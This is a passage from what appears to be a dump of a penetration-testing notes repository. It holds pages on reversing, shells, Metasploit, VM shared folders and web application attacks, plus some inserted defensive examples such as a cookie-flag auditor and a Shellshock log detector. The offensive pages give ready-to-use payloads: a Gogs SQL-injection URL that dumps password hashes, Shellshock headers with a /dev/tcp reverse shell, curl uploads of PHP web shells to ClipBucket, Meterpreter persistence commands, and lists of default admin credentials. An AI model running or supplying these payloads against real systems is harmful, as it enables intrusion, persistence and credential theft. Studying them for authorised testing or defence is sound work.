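    # e_type, e_machine, e_version, e_entry, e_phoff, e_shoff, e_flags,
    # e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    fields = struct.pack(endian + "HHIQQQIHHHHHH",
                         2, 0x3E, 1, e_entry, 64, 0, 0, 64, 56, 1, 64, 0, 0)
    return e_ident + fields


def parse_elf_header(data):
    """Parse e_ident and the fixed header fields. The byte order comes from EI_DATA,
    exactly as readelf does, so a patched EI_DATA byte changes how every later field reads."""
    if len(data) < 52 or data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file (bad magic)")
    ei_class, ei_data = data[4], data[5]
    if ei_data not in EI_DATA:
        raise ValueError("unknown EI_DATA value %d" % ei_data)
    endian = "<" if ei_data == 1 else ">"
    if ei_class == 2:
        fmt = endian + "HHIQQQIHHHHHH"   # 64-bit: e_entry/e_phoff/e_shoff are 8 bytes
    elif ei_class == 1:
        fmt = endian + "HHIIIIIHHHHHH"   # 32-bit: the same fields are 4 bytes
    else:
        raise ValueError("unknown EI_CLASS value %d" % ei_class)
    if len(data) < 16 + struct.calcsize(fmt):
        raise ValueError("truncated ELF header")
    (e_type, e_machine, _, e_entry, e_phoff, e_shoff,
     _, _, _, e_phnum, _, e_shnum, _) = struct.unpack_from(fmt, data, 16)
    return {
        "class": EI_CLASS[ei_class],
        "data": EI_DATA[ei_data],
        "type": E_TYPE.get(e_type, hex(e_type)),
        "machine": E_MACHINE.get(e_machine, hex(e_machine)),
        "entry": e_entry,
        "phoff": e_phoff, "phnum": e_phnum,
        "shoff": e_shoff, "shnum": e_shnum,
    }


def flip_ei_data(data):
    """Toggle the EI_DATA byte at offset 5 (01 <=> 02), the edit the hexedit note above describes."""
    flipped = bytearray(data)
    flipped[5] = 2 if flipped[5] == 1 else 1
    return bytes(flipped)


if __name__ == "__main__":
    hdr = build_elf64_header(little_endian=True)
    print(parse_elf_header(hdr))
    print(parse_elf_header(flip_ei_data(hdr)))  # same bytes, now decoded as big-endian
```

Because every multi-byte field is decoded according to EI_DATA, patching that single byte makes the unchanged e_entry bytes read as a completely different address (0x401040 becomes 0x4010400000000000 in the sample), which is why the edit confuses tools; an EI_DATA value that disagrees with the target architecture is also a quick integrity signal when triaging a suspicious binary.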
--------------------------------------------------------------------------------
/src/exploit/reverse-engineering/reversing/reversing-jar.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Reversing JAR File
3 | description: A JAR (Java Archive) file can be reversed using some tools.
4 | tags:
5 | - Reverse Engineering
6 | refs:
7 | date: 2024-02-18
8 | draft: false
9 | ---
10 |
11 | ## Code Analysis
12 |
13 | We can use the **`jd-gui`** GUI tool.
14 |
15 | ```sh
16 | jd-gui
17 | ```
18 |
--------------------------------------------------------------------------------
/src/exploit/reverse-engineering/reversing/reversing-ole.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Reversing OLE
3 | description: OLE is a mechanism that allows users to create and edit documents containing items or "objects" created by multiple applications.
4 | tags:
5 | - Reverse Engineering
6 | refs:
7 | date: 2024-02-18
8 | draft: false
9 | ---
10 |
11 | ## Oledump
12 |
13 | It dumps information about the streams of OLE files.
14 |
15 | ```sh
16 | oledump.py example.doc
17 |
18 | # -s: stream number to analyze
19 | # -d: dump
20 | oledump.py -s 8 -d example.doc
21 | oledump.py -s 9 -d example.doc
22 | ```
23 |
24 | Then decode the dumped output using online tools like CyberChef.
25 |
26 |
27 |
28 | ## Olevba
29 |
30 | Download the **[Oletools](https://github.com/decalage2/oletools)** to use it.
31 |
32 | ```sh
33 | olevba example.docm
34 | ```
35 |
36 | Copy the Visual Basic code printed above, then open **[OneCompiler](https://onecompiler.com/)**.
37 | Select "Visual Basic" as the programming language.
38 | Paste the copied code into the editor, then click Run.
39 |
40 |
--------------------------------------------------------------------------------
/src/exploit/reverse-engineering/reversing/reversing-pyc.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Reversing PYC (Python Compiled File)
3 | description: A PYC file is a compiled file generated from source code written in Python.
4 | tags:
5 | - Reverse Engineering
6 | refs:
7 | date: 2023-02-18
8 | draft: false
9 | ---
10 |
11 | ## Decompile
12 |
13 | [uncompyle6](https://github.com/rocky/python-uncompyle6/) is a PYC decompiler.
14 |
15 | We can install it easily using pip.
16 |
17 | ```bash
18 | pip install uncompyle6
19 | ```
20 |
21 | Then decompile the pyc file.
22 |
23 | ```bash
24 | uncompyle6 example.pyc
25 | ```
26 |
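Added example, not part of the page: a Python script that reads the pyc header defined by PEP 552 and, when the magic number matches the running interpreter, unmarshals the code object to list imported names, string constants and function names, the first things worth looking at before decompiling. `build_pyc` and `parse_pyc` are names chosen here and the compiled sample is constructed in the script.

```python
import importlib.util
import marshal
import struct
import time
import types

HEADER_SIZE = 16  # magic(4) + flags(4) + mtime-or-hash(8), PEP 552 layout (Python 3.7+)


def build_pyc(source, filename="example.py"):
    """Constructed sample: compile `source` and wrap it the way py_compile does
    (timestamp-based header). Not a pyc taken from the page."""
    code = compile(source, filename, "exec")
    header = importlib.util.MAGIC_NUMBER + struct.pack("<III", 0, int(time.time()), len(source))
    return header + marshal.dumps(code)


def parse_pyc(data):
    """Read the 16-byte header and, when the magic matches this interpreter,
    unmarshal the code object and summarise what a reverser looks at first."""
    if len(data) < HEADER_SIZE:
        raise ValueError("file too short for a pyc header")
    magic = data[:4]
    flags, = struct.unpack_from("<I", data, 4)
    info = {
        "magic": magic.hex(),
        "magic_matches": magic == importlib.util.MAGIC_NUMBER,
        "hash_based": bool(flags & 1),    # bit 0: validated by source hash instead of mtime
        "check_source": bool(flags & 2),  # bit 1: hash is checked at import time
    }
    if info["hash_based"]:
        info["source_hash"] = data[8:16].hex()
    else:
        mtime, size = struct.unpack_from("<II", data, 8)
        info["source_mtime"] = mtime
        info["source_size"] = size
    if not info["magic_matches"]:
        # The marshal format differs between versions, so unmarshalling is unreliable here;
        # this is why uncompyle6 needs an interpreter matching the pyc's version.
        return info
    code = marshal.loads(data[HEADER_SIZE:])
    info["names"] = list(code.co_names)
    info["strings"] = [c for c in code.co_consts if isinstance(c, str)]
    info["functions"] = [c.co_name for c in code.co_consts if isinstance(c, types.CodeType)]
    return info


if __name__ == "__main__":
    sample = build_pyc("import os\nSECRET = 'x'\ndef f():\n    return 1\n")
    print(parse_pyc(sample))
```

Checking the magic first is the practical point: a pyc whose magic does not match any installed interpreter is the usual reason a decompiler refuses the file, and the header tells you which interpreter to install before trying uncompyle6 (or decompyle3 for newer versions).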
--------------------------------------------------------------------------------
/src/exploit/shell/_data.yml:
--------------------------------------------------------------------------------
1 | category1: shell
2 | related_menus:
3 | - title: Others
4 | id: others
--------------------------------------------------------------------------------
/src/exploit/shell/reverse-shell-with-pwncat.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Reverse Shell with Pwncat
3 | description: Pwncat is a reverse and bind shell handler.
4 | tags:
5 | - Privilege Escalation
6 | - Reverse Shell
7 | - Windows
8 | refs:
9 | date: 2023-12-23
10 | draft: false
11 | ---
12 |
13 | It can be downloaded from [here](https://pwncat.org/).
14 | To listen for a remote connection, run the following command.
15 |
16 | ```bash
17 | pwncat-cs -lp 4444
18 |
19 | # For Windows target
20 | pwncat-cs -m windows -lp 4444
21 | ```
22 |
23 |
24 |
25 | ## Commands
26 |
27 | After the reverse connection is established, we can execute commands on either the local or the remote side.
28 |
29 | ```bash
30 | # Switch between Local and Remote shell
31 | Ctrl+D
32 |
33 | # Upload a file to target machine (e.g. upload example.txt from local to remote)
34 | (local) upload ./example.txt /tmp/example.txt
35 | ```
--------------------------------------------------------------------------------
/src/exploit/shell/upgrade-to-fully-interactive-tty.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Upgrade to Fully Interactive TTY
3 | description: After getting a reverse shell, the shell is poorly functional, so we can upgrade it to a more functional shell.
4 | tags:
5 | - Privilege Escalation
6 | - Reverse Shell
7 | refs:
8 | date: 2023-04-08
9 | draft: false
10 | ---
11 |
12 | ## Upgrade
13 |
14 | After connecting to the target shell via reverse shell, it's recommended to make the shell more usable.
15 |
16 | ```sh
17 | python3 -c 'import pty; pty.spawn("/bin/bash")'
18 | # or
19 | python -c 'import pty; pty.spawn("/bin/bash")'
20 | # or
21 | python2 -c 'import pty; pty.spawn("/bin/bash")'
22 | # or
23 | SHELL=/bin/bash script -q /dev/null
24 | ```
25 |
26 | The commands below make our shell even better.
27 |
28 | ```sh
29 | Ctrl+z
30 | stty raw -echo;fg
31 | Enter x2
32 | export TERM=xterm
33 | ```
34 |
--------------------------------------------------------------------------------
/src/exploit/steganography/_data.yml:
--------------------------------------------------------------------------------
1 | category1: steganography
2 | related_menus:
3 | - title: Others
4 | id: others
--------------------------------------------------------------------------------
/src/exploit/steganography/morse-image-reading.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Morse Image Reading
3 | description: If a picture contains Morse code, we can read it and translate it to human-readable strings.
4 | tags:
5 | - Steganography
6 | refs:
7 | - https://commons.wikimedia.org/wiki/File:International_Morse_Code.PNG
8 | date: 2023-07-14
9 | draft: false
10 | ---
11 |
12 | ## Morse OCR
13 |
14 | [morse-ocr](https://github.com/eauxfolles/morse-ocr) is a useful Python script to read and translate Morse code from a picture.
15 |
16 | ```bash
17 | python3 mocr.py example.png
18 | ```
19 |
--------------------------------------------------------------------------------
/src/exploit/tool/_data.yml:
--------------------------------------------------------------------------------
1 | category1: tool
2 | related_menus:
3 | - title: Virtual Machine
4 | id: virtual-machine
5 | - title: Others
6 | id: others
--------------------------------------------------------------------------------
/src/exploit/tool/metasploit-cheat-sheets.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Metasploit Cheat Sheets
3 | description:
4 | tags:
5 | - Linux
6 | - Windows
7 | refs:
8 | date: 2023-01-07
9 | draft: false
10 | ---
11 |
12 | ## Msfconsole
13 |
14 | No content yet.
15 |
16 |
17 |
18 | ## Meterpreter
19 |
20 | ```sh
21 | # List all sessions running on background
22 | msf> sessions
23 |
24 | # Start interacting with the session
25 | msf> sessions
26 |
27 | # Drop into a system command shell
28 | meterpreter> shell
29 | # Upgrade to full functional shell
30 | python3 -c 'import pty;pty.spawn("/bin/bash")'
31 |
32 | # Persistence at the target system
33 | # -h: Help
34 | meterpreter> run persistence -h
35 | # -U: Automatically start when the user logs on
36 | # -i: The interval in seconds between each connection attempt
37 | # -p: The port on which the system running Metasploit is listening
38 | # -r: The IP of the system running Metasploit listening for the connect back
39 | meterpreter> run persistence -U -i 5 -p 443 -r
40 | ```
41 |
42 |
43 |
44 | ## Msfvenom
45 |
46 | No content yet.
47 |
--------------------------------------------------------------------------------
/src/exploit/tool/virtual-machine/_data.yml:
--------------------------------------------------------------------------------
1 | category2: virtual-machine
--------------------------------------------------------------------------------
/src/exploit/tool/virtual-machine/vm-escape.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: VM (Virtual Machine) Escape
3 | description:
4 | tags:
5 | - Virtual Machine
6 | refs:
7 | date: 2024-05-21
8 | draft: false
9 | ---
10 |
11 | ## Shared Folder
12 |
13 | If the VM admin sets a folder containing sensitive files as a Shared Folder, we can get sensitive information by getting into the folder.
14 |
15 | ### VirtualBox
16 |
17 | ```bash
18 | # Linux
19 | cd /media/sf_
20 |
21 | # Windows
22 | cd \\VBOXSVR\\
23 | ```
24 |
25 | ### VMWare
26 |
27 | ```bash
28 | # Linux
29 | cd /mnt/hgfs/
30 |
31 | # Windows
32 | cd \\vmware-host\Shared Folder\
33 | ```
34 |
--------------------------------------------------------------------------------
/src/exploit/version-control/_data.yml:
--------------------------------------------------------------------------------
1 | category1: version_control
2 | related_menus:
3 | - title: Git
4 | id: git
--------------------------------------------------------------------------------
/src/exploit/version-control/git/_data.yml:
--------------------------------------------------------------------------------
1 | category2: git
--------------------------------------------------------------------------------
/src/exploit/version-control/git/create-git-local-server.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Create Git Local Server
3 | description:
4 | tags:
5 | - Git
6 | refs:
7 | - https://git-scm.com/book/en/v2/Git-Internals-Transfer-Protocols
8 | date: 2023-11-05
9 | draft: false
10 | ---
11 |
12 | ## Start Local Git Server (Dumb, HTTP)
13 |
14 | ```bash
15 | cd test_repo
16 | git init
17 | git add . && git commit -m "first commit"
18 | cd .git
19 | # Update auxiliary info file to help dumb server.
20 | # --bare: Bare repository (does not have a working directory)
21 | git --bare update-server-info
22 | cd ..
23 | python3 -m http.server
24 | ```
25 |
--------------------------------------------------------------------------------
/src/exploit/version-control/git/gogs-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Gogs Pentesting
3 | description: Gogs (Go Git Service) is a painless self-hosted Git Service.
4 | tags:
5 | - Git
6 | - SQL Injection
7 | - Web
8 | refs:
9 | date: 2023-04-27
10 | draft: false
11 | ---
12 |
13 | ## SQL injection ([CVE-2014-8682](https://www.exploit-db.com/exploits/35238))
14 |
15 | ```txt
16 | http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/passwd/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--
17 | ```
18 |
19 | ### Automation
20 |
21 | ```bash
22 | sqlmap -u "https://example.com/api/v1/repos/search?q=test"
23 | sqlmap -u "https://example.com/api/v1/users/search?q=test"
24 | ```
25 |
26 |
27 |
28 | ## Git Hooks Remote Code Execution (RCE)
29 |
30 | ```bash
31 | msfconsole
32 | msf> use exploit/multi/http/gogs_git_hooks_rce
33 | msf> (set options...)
34 | msf> run
35 | ```
--------------------------------------------------------------------------------
/src/exploit/web/_data.yml:
--------------------------------------------------------------------------------
1 | category1: web
2 | related_menus:
3 | - title: Method
4 | id: method
5 | - title: Security Risk
6 | id: security-risk
7 | - title: Cookie
8 | id: cookie
9 | - title: CMS
10 | id: cms
11 | - title: Framework
12 | id: framework
13 | - title: Template Engine
14 | id: template-engine
15 | - title: API
16 | id: api
17 | - title: Microsoft
18 | id: microsoft
19 | - title: Tool
20 | id: tool
21 | - title: Others
22 | id: others
--------------------------------------------------------------------------------
/src/exploit/web/apache-activemq-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Apache ActiveMQ Pentesting
3 | description: Apache ActiveMQ is a message broker written in Java together with a full Java Message Service client.
4 | tags:
5 | - Web
6 | refs:
7 | date: 2023-02-23
8 | draft: false
9 | ---
10 |
11 | ## Default Credentials
12 |
13 | ```bash
14 | admin:admin
15 | ```
16 |
17 |
18 |
19 | ## Interaction with MQTT
20 |
21 | If an MQTT server is running on the target system, we can subscribe/publish to a topic in ActiveMQ using an MQTT client.
22 |
23 | ### Subscribe to a Topic
24 |
25 | ```bash
26 | # -h: Host
27 | # -u: Username
28 | # -P: Password
29 | # -t: Topic name
30 | # -V: MQTT protocol version (5, 31, 311)
31 | mosquitto_sub -h example.com -u admin -P admin -t 'example/topic' -V 31
30 | ```
31 |
32 |
33 |
34 | ## Web Shell by File Upload JSP
35 |
36 | ActiveMQ is vulnerable to a web shell via upload of an arbitrary JSP file.
37 |
38 | ```bash
39 | msfconsole
40 | msf> use exploit/multi/http/apache_activemq_upload_jsp
41 | msf> set ...
42 | msf> run
43 | meterpreter> shell
44 | ```
45 |
--------------------------------------------------------------------------------
/src/exploit/web/api/_data.yml:
--------------------------------------------------------------------------------
1 | category2: api
--------------------------------------------------------------------------------
/src/exploit/web/atlassian-confluence-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Atlassian Confluence Pentesting
3 | description: Atlassian Confluence is a collaboration wiki tool used to help teams to collaborate and share knowledge efficiently.
4 | tags:
5 | - Web
6 | refs:
7 | date: 2022-11-22
8 | draft: false
9 | ---
10 |
11 | ## Remote Code Execution (CVE-2022-26134)
12 |
13 | Download the exploit from the [repo](https://github.com/h3v0x/CVE-2022-26134).
14 |
15 | ```sh
16 | python3 exploit.py -u http:// -c whoami
17 | ```
18 |
19 |
--------------------------------------------------------------------------------
/src/exploit/web/bookmarklet-attack.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Bookmarklet Attack
3 | description: If attackers can inject arbitrary JavaScript code in target website, they can induce victims to malicious executions with bookmarklet.
4 | tags:
5 | - Web
6 | refs:
7 | - https://socradar.io/csp-bypass-unveiled-the-hidden-threat-of-bookmarklets/
8 | date: 2023-06-19
9 | draft: false
10 | ---
11 |
12 | ## Exploitation
13 |
14 | ### Malicious Links
15 |
16 | Attackers induce victims to add their malicious link to the bookmark menu as below.
17 |
18 | ```html
19 |
Drag and drop the following link into the bookmark menu to access easily!
20 | Example.com
21 | ```
22 |
23 | In addition, if the current website does not set the **`HttpOnly`** flag on the **`Set-Cookie`** response header, attackers can read the victim's cookie and send it to the malicious website as below.
24 |
25 | ```html
26 |
Drag and drop me the following link into the bookmark menu to access easily!
27 | Example.com
28 | ```
29 |
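An added example, not taken from the page: a Python audit of a `Set-Cookie` header value that reports the missing attributes which make the cookie theft above possible (and the related transport and cross-site flags). The sample header values are constructed, and `parse_set_cookie` and `audit_set_cookie` are names chosen here.

```python
def parse_set_cookie(header):
    """Split one Set-Cookie value into name, value and lower-cased attributes."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def audit_set_cookie(header):
    """Return the weaknesses of a session cookie against script access (the bookmarklet
    scenario above), plain-HTTP transport and cross-site requests."""
    attrs = parse_set_cookie(header)["attrs"]
    findings = []
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable via document.cookie by injected or bookmarklet JavaScript")
    if "secure" not in attrs:
        findings.append("missing Secure: sent over plain HTTP")
    samesite = attrs.get("samesite")
    if samesite in (None, True):
        findings.append("missing SameSite: relies on the browser default")
    elif samesite.lower() == "none" and "secure" not in attrs:
        findings.append("SameSite=None without Secure: rejected or downgraded by browsers")
    return findings


# Constructed sample headers: the weak form and the hardened form of the same cookie.
WEAK_COOKIE = "sessid=abcdef; Path=/"
HARDENED_COOKIE = "sessid=abcdef; Path=/; HttpOnly; Secure; SameSite=Lax"

if __name__ == "__main__":
    for h in (WEAK_COOKIE, HARDENED_COOKIE):
        print(h, "->", audit_set_cookie(h) or "ok")
```

Run it against the headers your own application actually emits (for example from a captured response); HttpOnly removes the cookie from `document.cookie` entirely, so the bookmarklet can still run in the victim's session but cannot exfiltrate the session token itself.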
--------------------------------------------------------------------------------
/src/exploit/web/browser-in-the-browser-attack.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Browser in the Browser (BITB) Attack
3 | description:
4 | tags:
5 | - Web
6 | refs:
7 | date: 2023-02-02
8 | draft: false
9 | ---
10 |
11 | ## Use Templates
12 |
13 | [This repository](https://github.com/mrd0x/BITB) is useful for attacking.
--------------------------------------------------------------------------------
/src/exploit/web/cacti-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Cacti Pentesting
3 | description: Cacti is a web-based network monitoring, performance, fault and configuration management framework designed as a front-end application.
4 | tags:
5 | - Web
6 | refs:
7 | - https://pentest-tools.com/vulnerabilities-exploits/cacti-remote-code-execution_CVE-2022-46169
8 | date: 2023-05-02
9 | draft: false
10 | ---
11 |
12 | ## Default Credentials
13 |
14 | ```bash
15 | admin:admin
16 | ```
17 |
18 |
19 |
20 | ## Common Directories
21 |
22 | ```bash
23 | /include/config.php
24 | ```
25 |
26 |
27 |
28 | ## Remote Code Execution (RCE) CVE-2022-46169
29 |
30 | Reference: [https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/](https://www.sonarsource.com/blog/cacti-unauthenticated-remote-code-execution/)
31 |
32 | ```bash
33 | msfconsole
34 | msf> use exploit/linux/http/cacti_unauthenticated_cmd_injection
35 | msf> (set options...)
36 | msf> run
37 | ```
38 |
39 | Also we can refer to [Exploit DB](https://www.exploit-db.com/exploits/51166).
--------------------------------------------------------------------------------
/src/exploit/web/cgi-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: CGI Pentesting
3 | description: CGI (Common Gateway Interface) is a standard protocol that enables web servers to interact with external programs, typically to generate dynamic web content or handle web form submissions. If there is /cgi-bin/ directory in the website, we may be able to execute arbitrary OS command.
4 | tags:
5 | - Web
6 | refs:
7 | date: 2023-03-28
8 | draft: false
9 | ---
10 |
11 | ## Enumeration CGI Scripts
12 |
13 | ```bash
14 | ffuf -u https://example.com/cgi-bin/FUZZ.cgi -w wordlist.txt
15 | ```
16 |
17 |
18 |
19 | ## Shellshock
20 |
21 | Shellshock is a vulnerability in Bash versions 1.0.3 through 4.3 that allows users to execute arbitrary commands.
22 | If we find a CGI script under **`/cgi-bin/`**, modifying an HTTP header can lead to remote code execution.
23 |
24 | ```bash
25 | GET /cgi-bin/example.cgi HTTP/1.1
26 |
27 | User-Agent: () { :; }; /bin/bash -c "sleep 5"
28 | Cookie: () { :; }; /bin/bash -c "sleep 5"
29 |
30 | # Reverse Shell
31 | User-Agent: () { :; }; /bin/bash -c "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"
32 | ```
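Added detection example, not from the page: a Python scan of Apache combined-format access log lines for the Bash exported-function preamble that every Shellshock header payload begins with, with requests to `/cgi-bin/` flagged for priority. The log lines are constructed samples and `find_shellshock` is a name chosen here; standard access logs do not record the Cookie header, so catching the Cookie variant needs full request capture (a WAF or proxy log).

```python
import re

# Apache "combined" log format: client ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d+) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Every Shellshock payload starts with Bash's exported-function preamble "() {",
# whatever command follows it, so the preamble is the stable thing to match.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def find_shellshock(log_lines):
    """Return one finding per log line whose user-agent or referer field carries the preamble."""
    findings = []
    for lineno, line in enumerate(log_lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue  # not in combined format; a real pipeline would count these separately
        for field in ("ua", "referer"):
            if SHELLSHOCK_RE.search(m.group(field)):
                findings.append({
                    "line": lineno,
                    "client": m.group("client"),
                    "path": m.group("path"),
                    "field": field,
                    "targets_cgi": m.group("path").startswith("/cgi-bin/"),
                })
                break
    return findings


# Constructed sample lines (not real traffic): one probe and two benign requests.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jan/2024:12:00:00 +0000] "GET /cgi-bin/example.cgi HTTP/1.1" 200 512 "-" '
    '"() { :; }; /bin/bash -c \\"sleep 5\\""',
    '10.0.0.6 - - [10/Jan/2024:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Gecko/20100101 Firefox/121.0"',
    '10.0.0.7 - - [10/Jan/2024:12:00:02 +0000] "GET /cgi-bin/status.cgi HTTP/1.1" 200 64 "-" "curl/8.4.0"',
]

if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(hit)
```

Matching the preamble rather than a specific command keeps the rule useful for the `sleep` probe and the reverse-shell variant alike; the real fix is patching Bash, and the presence of the preamble in a 200 response line for a CGI path is the trigger to check the host.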
--------------------------------------------------------------------------------
/src/exploit/web/clipbucket-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: ClipBucket Pentesting
3 | description: ClipBucket is a freely downloadable PHP script that will let you start your own Video Sharing website (YouTube Clone).
4 | tags:
5 | - Web
6 | refs:
7 | date: 2023-02-19
8 | draft: false
9 | ---
10 |
11 | ## Arbitrary File Upload < v4.0.0
12 |
13 | ClipBucket versions before 4.0.0 are vulnerable to file upload in the 'uploader' actions. We can upload arbitrary files, so we can get a reverse shell.
14 |
15 | ### 1. Prepare Payload
16 |
17 | Create a PHP reverse shell script on the local machine.
18 |
19 | ```bash
20 | cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php
21 | ```
22 |
23 | Update $ip and $port with your local IP address and port.
24 |
25 | ### 2. Upload the Payload
26 |
27 | Next, upload the above PHP script to the target website.
28 |
29 | ```bash
30 | curl -F "file=@shell.php" -F "plupload=1" -F "name=shell.php" "https://example.com/actions/beats_uploader.php"
31 | ```
32 |
33 | ### 3. Reverse Shell
34 |
35 | On the local machine, start a listener.
36 |
37 | ```bash
38 | nc -lvnp 4444
39 | ```
40 |
41 | Then access to **`https://example.com/actions/CB_BEATS_UPLOAD_DIR/.php`**.
42 | We should get a shell.
--------------------------------------------------------------------------------
/src/exploit/web/cms/_data.yml:
--------------------------------------------------------------------------------
1 | category2: cms
--------------------------------------------------------------------------------
/src/exploit/web/cms/bolt-cms-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Bolt CMS Pentesting
3 | description: Bolt is an open-source content management system based on PHP.
4 | tags:
5 | - CMS
6 | - Web
7 | refs:
8 | date: 2022-11-22
9 | draft: false
10 | ---
11 |
12 | ## Login Page
13 |
14 | ```sh
15 | /bolt
16 | ```
17 |
18 |
19 |
20 | ## Remote Code Execution (v3.7.1)
21 |
22 | ```sh
23 | msfconsole
24 | msf> use exploit/unix/webapp/bolt_authenticated_rce
25 | msf> set lhost
26 | msf> set rhosts
27 | msf> set username
28 | msf> set password
29 | msf> run
30 | ```
31 |
--------------------------------------------------------------------------------
/src/exploit/web/cms/cockpit-cms-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Cockpit CMS Pentesting
3 | description: Cockpit CMS is a content management system for publishing contents.
4 | tags:
5 | - CMS
6 | - Web
7 | refs:
8 | date: 2023-02-05
9 | draft: false
10 | ---
11 |
12 | ## Enumeration & Remote Code Execution (RCE) & Reverse Shell
13 |
14 | ```bash
15 | # Reset password (CVE-2020-35847)
16 | msf> use exploit/multi/cockpit_cms_rce
17 | msf> set USER admin
18 | msf> run
19 | ```
20 |
21 |
22 |
23 | ## Version Detection
24 |
25 | The Cockpit CMS version is displayed as the value of the "data-version" attribute in the html tag.
26 |
27 | ```bash
28 |
29 | ```
30 |
31 |
32 |
33 | ## Common Directories
34 |
35 | ```bash
36 | /auth/check # We can enumerate users using the path
37 | /auth/forgotpassword
38 | /auth/index
39 | /auth/login
40 | /auth/requestreset # We can enumerate users using the path
41 | ```
--------------------------------------------------------------------------------
/src/exploit/web/cms/concrete-cms-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Concrete CMS Pentesting
3 | description: Concrete CMS is a content management system for publishing contents.
4 | tags:
5 | - CMS
6 | - Web
7 | refs:
8 | date: 2023-02-05
9 | draft: false
10 | ---
11 |
12 | ## Default Credentials
13 |
14 | The default username is **“admin”** in Concrete5.
--------------------------------------------------------------------------------
/src/exploit/web/cms/fuel-cms-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: FUEL CMS Pentesting
3 | description: FUEL is a content management system (CMS).
4 | tags:
5 | - Web
6 | refs:
7 | date: 2023-02-20
8 | draft: false
9 | ---
10 |
11 | ## Default Credential
12 |
13 | ```txt
14 | admin:admin
15 | ```
16 |
--------------------------------------------------------------------------------
/src/exploit/web/cms/index.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: CMS (Content Management System) Pentesting
3 | description: CMS (Content Management System) is computer software used to manage the creation and modification of digital content.
4 | tags:
5 | - Web
6 | refs:
7 | date: 2023-02-20
8 | draft: false
9 | ---
10 |
11 | ## CMS Detection
12 |
13 | If you don't know which CMS is used on the target website, you can detect it using **[CMSeeK](https://github.com/Tuhinshubhra/CMSeeK)**, which is an automatic CMS detection tool.
14 |
15 | ```sh
16 | cmseek -u vulnerable.com
17 | ```
18 |
--------------------------------------------------------------------------------
/src/exploit/web/cms/mara-cms-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Mara CMS Pentesting
3 | description: Mara CMS is a file based content management system.
4 | tags:
5 | - CMS
6 | - Web
7 | refs:
8 | - https://www.exploit-db.com/exploits/48780
9 | date: 2023-03-07
10 | draft: false
11 | ---
12 |
13 | ## Default Credentials
14 |
15 | ```bash
16 | admin:changeme
17 | ```
18 |
19 |
20 |
21 | ## Remote Code Execution (RCE) v7.5
22 |
23 | Reference: [https://www.exploit-db.com/exploits/48780](https://www.exploit-db.com/exploits/48780)
24 |
25 | ### Automation
26 |
27 | ```bash
28 | msfconsole
29 | msf> use exploit/multi/http/maracms_upload_exec
30 | msf> set rhosts
31 | msf> set lhost
32 | msf> set srvhost
33 | msf> set srvport
34 | msf> set targeturi /path/to/maracms/
35 | msf> set targeturipath /path/to/maracms/
36 | ```
37 |
--------------------------------------------------------------------------------
/src/exploit/web/cms/subrion-cms-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Subrion CMS Pentesting
3 | description: Subrion is a content management system (CMS).
4 | tags:
5 | - Web
6 | refs:
7 | date: 2023-02-20
8 | draft: false
9 | ---
10 |
11 | ## File Upload to Reverse Shell (Credential Required)
12 |
13 | ### 1. Download Reverse Shell Payload
14 |
15 | Get the PHP payload from [php-reverse-shell](https://github.com/pentestmonkey/php-reverse-shell), and change the file extension to **'.phar'**.
16 | Then start a listener.
17 |
18 | ```sh
19 | nc -lvnp 4444
20 | ```
21 |
22 | ### 2. Upload the Payload in Subrion Panel
23 |
24 | 1. **Login**
25 |
26 | 2. **Move to Content -> Uploads in Panel**
27 |
28 | 3. **Upload reverse-shell.phar**
29 |
30 | 4. **Access to /subrion/upload/reverse-shell.phar**
31 |
32 | Now you get a shell.
--------------------------------------------------------------------------------
/src/exploit/web/code-deobfuscation.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Code Deobfuscation
3 | description: This technique makes obfuscated code (such as JavaScript) understandable.
4 | tags:
5 | - Web
